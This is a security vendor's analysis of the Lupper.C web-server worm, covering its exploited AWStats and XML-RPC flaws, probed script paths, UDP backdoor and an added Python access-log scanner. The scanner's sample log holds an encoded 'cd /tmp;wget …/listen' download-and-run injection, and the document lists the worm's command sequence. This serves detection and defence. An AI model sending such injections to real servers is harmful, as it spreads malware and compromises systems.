Immediate Protection Info
| Signature | Product | Removal Instructions |
|---|---|---|
| 11.x/9504 | eTrust Antivirus v7/8* (Vet Engine) | |
| 6.2x/9504 | eTrust EZ Antivirus 6.2x | |
| 6.3x/9504 | eTrust EZ Antivirus 6.3x | |
| 6.4x/9504 | eTrust EZ Antivirus 6.4x | |
| 7.x/9504 | eTrust EZ Antivirus 7.x | |
| 10.6x/9504 | Vet Anti-Virus 10.6x | |
Description
Lupper.C is a worm designed to spread through web servers by exploiting two different security vulnerabilities. This variant has been distributed as a 443,364-byte i386 ELF program.
Method of Distribution
Via Exploits
Lupper attempts to execute a simple set of four commands on a remote server:
- Change folder to /tmp
- Use Wget to download a copy of the worm named “listen” from a particular hard-coded IP address
- Modify its execution attributes
- Execute the downloaded copy of the worm
The worm sends the above commands by exploiting the following vulnerabilities:
Trying to exploit the AWStats vulnerability, the worm attempts to submit its commands to the awstats.pl script at the following locations:
/cgi-bin/awstats/awstats.pl
/cgi-bin/awstats.pl
/awstats/awstats.pl
Trying to exploit the XML-RPC vulnerability, the worm attempts to submit its commands to the following scripts:
/xmlsrv/xmlrpc.php
/xmlrpc/xmlrpc.php
/xmlrpc.php
/wordpress/xmlrpc.php
/phpgroupware/xmlrpc.php
/drupal/xmlrpc.php
/blogs/xmlsrv/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blog/xmlrpc.php
/xmlrpc.php
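The script locations above can be used to hunt for Lupper.C probes in web server access logs. The following is an added example, not part of the original analysis: it assumes Apache common/combined log format, a hypothetical sweep threshold of three distinct paths per client, and a constructed sample log with a placeholder query parameter.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Script locations probed by the worm, copied from the lists above.
AWSTATS = {"/cgi-bin/awstats/awstats.pl", "/cgi-bin/awstats.pl", "/awstats/awstats.pl"}
XMLRPC = {"/xmlsrv/xmlrpc.php", "/xmlrpc/xmlrpc.php", "/xmlrpc.php",
          "/wordpress/xmlrpc.php", "/phpgroupware/xmlrpc.php", "/drupal/xmlrpc.php",
          "/blogs/xmlsrv/xmlrpc.php", "/blog/xmlsrv/xmlrpc.php", "/blog/xmlrpc.php"}
# Strings from the command sequence described above (cd /tmp, wget, "listen").
HINTS = ("/tmp", "wget", "listen")
# Assumption: Apache common/combined log format.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+)[^"]*" \d{3}')

def scan(lines, sweep_threshold=3):
    """Group requests to the probed scripts by client and flag likely worm sweeps."""
    findings = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        family = ("awstats" if parts.path in AWSTATS
                  else "xmlrpc" if parts.path in XMLRPC else None)
        if family is None:
            continue
        f = findings.setdefault(
            m["ip"], {"paths": set(), "families": set(), "command_in_query": False})
        f["paths"].add(parts.path)
        f["families"].add(family)
        # POST bodies are not logged, so only query strings can be inspected here.
        query = unquote_plus(parts.query).lower()
        if sum(h in query for h in HINTS) >= 2:
            f["command_in_query"] = True
    for f in findings.values():
        # A normal client uses one endpoint; the worm tries many install locations.
        f["sweep"] = len(f["paths"]) >= sweep_threshold
    return findings

# Constructed sample log (documentation IP ranges; "x" is a placeholder parameter).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2006:04:12:01 +0000] "GET /cgi-bin/awstats/awstats.pl?x=cd%20/tmp%3Bwget%20192.0.2.9/listen HTTP/1.0" 404 210',
    '198.51.100.7 - - [01/Jan/2006:04:12:02 +0000] "POST /xmlrpc.php HTTP/1.0" 404 208',
    '198.51.100.7 - - [01/Jan/2006:04:12:02 +0000] "POST /drupal/xmlrpc.php HTTP/1.0" 404 208',
    '203.0.113.20 - - [01/Jan/2006:09:30:11 +0000] "POST /xmlrpc.php HTTP/1.1" 200 512',
    '203.0.113.20 - - [01/Jan/2006:09:30:15 +0000] "GET /index.html HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for ip, f in scan(SAMPLE_LOG).items():
        print(ip, sorted(f["paths"]), "sweep" if f["sweep"] else "", f["command_in_query"])
```

A client flagged as a sweep that received a 200 response on any of these paths warrants a check of /tmp for a file named "listen" and of the host for the listen.log file described below.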
Payload
Backdoor Functionality
Lupper.C opens a UDP backdoor on port 27105.
The worm can relay Internet traffic – i.e. act as a proxy.
Lupper.C can also update itself.
For additional information:
The worm creates the file listen.log, which is used to keep the history of the worm execution and stores information like build number, worm actions, access errors etc.
The worm reports back to particular remote sites, sending data through UDP port 25555.
Analysis by Jakub Kaminski